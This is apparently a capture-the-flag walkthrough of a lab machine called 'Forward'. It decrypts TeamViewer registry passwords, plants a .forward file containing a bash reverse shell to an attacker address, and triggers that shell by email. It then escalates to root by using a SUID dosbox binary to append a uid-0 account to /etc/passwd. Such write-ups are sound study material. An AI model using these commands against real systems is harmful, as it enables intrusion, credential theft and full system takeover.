Forward - OSPG
Summary of Result
In this writeup, we decipher a default TeamViewer password and access the home directory of the user fox via the SMB. We’ll then abuse the .forward file to execute arbitrary commands of our choice and acquire the initial access. Enumerating locally exposes the dosbox SUID binary, which we can employ to overwrite the /etc/passwd file and fully compromise root access.
Enumeration
Nmap
We’ll begin with a nmap scan:
$ sudo nmap -sV -p- --open -oA nmap/services -Pn 192.168.185.157
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open smtp Exim smtpd
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
- There are a few services running on the target system. We will go through them one by one.
SMB Enumeration
Let’s us fisrt list the available shares.
$ smbmap -H $IP
[+] IP: 192.168.112.157:445 Name: 192.168.112.157
Disk Permissions Comment
---- ----------- -------
utils READ ONLY Utilities
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (Samba 4.9.5-Debian)
From the result, utils is the only one we can access.
To initiate an interactive SMB shell against the utils share, we can execute the following command:
$ smbclient \\\\192.168.185.157\\utils -U 'anonymous'
Enter WORKGROUP\anonymous's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Dec 18 19:26:48 2020
.. D 0 Fri Dec 18 18:48:44 2020
fox.reg N 10634 Fri Dec 18 18:48:44 2020
TeamViewer_Setup_v7.exe N 5024832 Fri Dec 18 18:48:44 2020
mara.reg N 10408 Fri Dec 18 18:48:44 2020
vale.reg N 10206 Fri Dec 18 18:48:44 2020
golemitratigunda.reg N 10206 Fri Dec 18 18:48:44 2020
alberobello.reg N 10206 Fri Dec 18 18:48:44 2020
giammy.reg N 10312 Fri Dec 18 18:48:44 2020
README.all N 165 Fri Dec 18 18:53:55 2020
14384136 blocks of size 1024. 11597116 blocks available
Some compelling files with the .reg extention are the Windows registry ones.
To effectively investigate those files, let’s us download them to our local machine. In the SMB interactive shell, execute the following:
smb: \> mget *
# → If prompted, we type "y" or "yes" to permit the downloading process.
After all the files are downloaded, we can start inspecting them sequentially.
Let’s begin with the README.all file.
$ cat README.all
each of you has to install TeamViewer and then import your own registry key for automatic configuration.
Don't worry about the password, it's well encrypted!
Root!
The “registry key” implies the .reg files. It seems like we can find cipher passwords inside them. However, it’s worth noticing that .reg files can’t be read by *Unix OS, we need to convert them into a unix-readable form.
This can be done with dos2unix utility.
$ dos2unix *.reg
dos2unix: converting UTF-16LE file ... to UTF-8 Unix format...
$ file mara.reg
mara.reg: ASCII text
Now, we try to read one of them.
$ cat mara.reg
[...]
"SecurityPasswordAES"=hex:88,9d,f1,f5,80,27,74,a5,d2,45,be,78,b1,7e,56,a0,1f,\
16,12,86,64,88,3e,73,b9,02,5e,7b,78,2e,0f,7e,b0,61,f1,69,7b,a9,aa,46,41,f1,\
cc,27,51,97,73,e7,4e,58,e5,f2,08,ab,b6,4a,8e,e1,b0,f6,e4,77,02,78
[...]
It looks like SecurityPasswordAES variable secures cipher passwords we’re searching for.
By conducting a few researches, we found that TeamViewer7 reuses the same iv and key to encrypt their passwords, which can be subsequently decrypted using the .py script from whynotsecurity.
$ python3 teamviewer_password_decrypt.py
This is a quick and dirty Teamviewer password decrypter basis wonderful post by @whynotsecurity.
Read this blogpost if you haven't already : https://whynotsecurity.com/blog/teamviewer
[...]
Enter output from registry without spaces : 2c0fff76ca03d7c21c0d3c8b55edd8de37f89720ae6ed382d0ad2e70f97effea0b0c1cd901cbd1ad90fc601b9e40fc9c4baf65eec51962eb4edacc7c30a8a66b0cbd9f362ac0cad1598904aecb8b9610
Decrypted password is : iparalipomenidellabatracomiomachia
Accordingly, decrypt the rest of them yieled a list of nice passwords.
iparalipomenidellabatracomiomachia
alberobello
hackmeifyoureable
cocomerirossi
bangladesh
paralipomenibatracomiomachia
Try each combination against either SSH or SMB service, we disclose a new SMB share - fox.
$ smbmap -H 192.168.117.157 -u fox -p iparalipomenidellabatracomiomachia
[+] IP: 192.168.117.157:445 Name: 192.168.117.157
Disk Permissions Comment
---- ----------- -------
utils READ ONLY Utilities
print$ READ ONLY Printer Drivers
IPC$ NO ACCESS IPC Service (Samba 4.9.5-Debian)
fox READ, WRITE Home Directories
Once again, we can access fox share with smbclient utility.
$ smbclient \\\\192.168.185.157\\fox -U fox
Enter WORKGROUP\fox's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Aug 24 08:43:00 2021
.. D 0 Sat Jan 9 05:04:11 2021
.bashrc H 3526 Fri Dec 18 18:48:44 2020
.Xauthority H 53 Tue Aug 10 07:55:45 2021
.bash_history H 0 Tue Aug 24 05:08:55 2021
.profile H 807 Fri Dec 18 18:48:44 2020
local.txt N 33 Tue Aug 24 08:27:52 2021
.dosbox DH 0 Tue Aug 10 07:55:54 2021
.bash_logout H 220 Fri Dec 18 18:48:44 2020
.gnupg DH 0 Tue Aug 10 07:40:39 2021
.forward AH 1 Fri Aug 20 03:17:16 2021
14384136 blocks of size 1024. 11597116 blocks available
just like that!.
Exploitation
Previously, we are able to access fox home directory via SMB, its good to note that the .forward file can be abused to execute any command of our control.
The .forward file
Let’s us explain the .forward file a bit more.
Simply to say, .forward automatically replies to an email, we can either reply to the sender or forward the email to another address. It is typically located in ~/.forward and follows the structure as belows.
<who_to_forward>(i.e root, admin@example.com)
"|<code_to_execute>"
Notice that the double quotes ("") and the pipe (|) are required.
If an email is sent to the user with the .forward file in their home directory, the code is executed.
With all that, let’s us craft a reverse shell and upload it onto the fox’s home directory
$ cat .forward
root
"|/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.49.185/22 0>&1'"
$ smbclient \\\\192.168.185.157\\fox -U fox
Enter WORKGROUP\fox's password:
Try "help" to get a list of possible commands.
smb: \> put .forward
putting file .forward as \.forward (0.1 kb/s) (average 0.1 kb/s)
smb: \> ls
. D 0 Fri Aug 20 03:17:16 2021
.. D 0 Sat Jan 9 05:04:11 2021
.bashrc H 3526 Fri Dec 18 18:48:44 2020
.Xauthority H 53 Tue Aug 10 07:55:45 2021
.bash_history H 0 Tue Aug 24 05:08:55 2021
.profile H 807 Fri Dec 18 18:48:44 2020
local.txt N 33 Tue Aug 24 09:04:02 2021
.dosbox DH 0 Tue Aug 10 07:55:54 2021
.bash_logout H 220 Fri Dec 18 18:48:44 2020
.gnupg DH 0 Tue Aug 10 07:40:39 2021
.forward AH 71 Tue Aug 24 09:05:45 2021
14384136 blocks of size 1024. 11597108 blocks available
As long as the .forward is uploaded, we can trigger code by sending an email to user fox.
$ telnet 192.168.185.157 25
Trying 192.168.185.157...
Connected to 192.168.185.157.
Escape character is '^]'.
220 forward ESMTP Exim 4.92 Mon, 23 Aug 2021 19:05:33 -0400
EHLO forward
250-forward Hello forward [192.168.49.185]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-CHUNKING
250-PRDR
250 HELP
mail from: jay@jayngng.github.io
250 OK
rcpt to: fox@forward
250 Accepted
data
354 Enter message, ending with "." on a line by itself
BoOM!!
Thanks,
Jay
.
After a few seconds, our nc should catch the reverse shell at port 22 as fox.
$ sudo nc -nlvp 22
Listening on 0.0.0.0 22
Connection received on 192.168.185.157 60456
bash: cannot set terminal process group (898): Inappropriate ioctl for device
bash: no job control in this shell
fox@forward:~$ id
id
uid=1000(fox) gid=100(users) groups=100(users)
Privilege Escalation
fox Plain-text Password
There are some other users on the system, we can try to check .bash_history files to see if there is any interesting information.
fox@forward:~$ find /home/* -name .bash_history -size +0 -exec cat {} \; 2>/dev/null
sshh mara@192.168.0.191
CIARLARIELLOkj99
ssh mara@192.168.0.191
Quickly, we attain an interesting string CIARLARIELLOkj99, seems like mara password. However, attempting different combinations reveal the password belongs to fox user. We can SSH our way in with the new password.
SUID binary
Let’s us try to enumerate SUID binary.
fox@forward:~$ find / -perm -u=s -ls 2>/dev/null
[...]
283136 2612 -rwsr-sr-x 1 root root 2671432 Jul 8 2019 /usr/bin/dosbox
[...]
The dosbox is our target for further investigation. Primarily, dosbox is a linux utility which supports to play some Windows games. Since it require X11 display graphic, we cannot start it from the regular ssh shell. To enable X11 display, we can use ssh command with -X switch.
The command is as follow:
$ ssh fox@192.168.185.157 -X
$ dosbox # -> launch dosbox.
After a few seconds, a DOSBOX console will pop up. Spending sometime to play with it, we know that it can be connected to our target machine drive with the mount command.
Let’s us conclude the information we’ve obtained so far.
→ dosbox is set with SUID, which means we are root of the DOSBOX console.
→ The DOSBOX console can connect to target system drives.
→ As a result, we can create a root entry to /etc/passwd.
The steps to reproduce the attack as the followings:
- On the DOSBOX console, execute.
Z:\> mount e /etc # → Mount /etc directory to E: drive of the DOSBOX Z:\> mount f /home/fox # → Mount /home/fox directory to F: drive of the DOSBOX - On the
foxterminal, execute.fox@forward:~$ cp /etc/passwd . # → Copy /etc/passwd file to current directory fox@forward:~$ echo 'jay:$1$letmein1$WSOs/feh/fhyU4QWmT0aG1:0:0::/root:/bin/bash' >> passwd # → Add an user jay entry to the new password file - To overwrite the
passwdfile, on the previous DOSBOX console, continue executing:Z:\> E: # → Change from drive Z to drive E E:\> copy f:\passwd passwd # → Copy /home/fox/passwd to /etc/passwd
Successfully executing the above commands will open a new entry for user jay, who is also a root user.
fox@forward:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
[...]
jay:$1$letmein1$WSOs/feh/fhyU4QWmT0aG1:0:0::/root:/bin/bash
We can now su to jay.
fox@forward:~$ su jay
Password: # → password is admin123
root@forward:/home/fox# id
uid=0(root) gid=0(root) groups=0(root)
and become root!.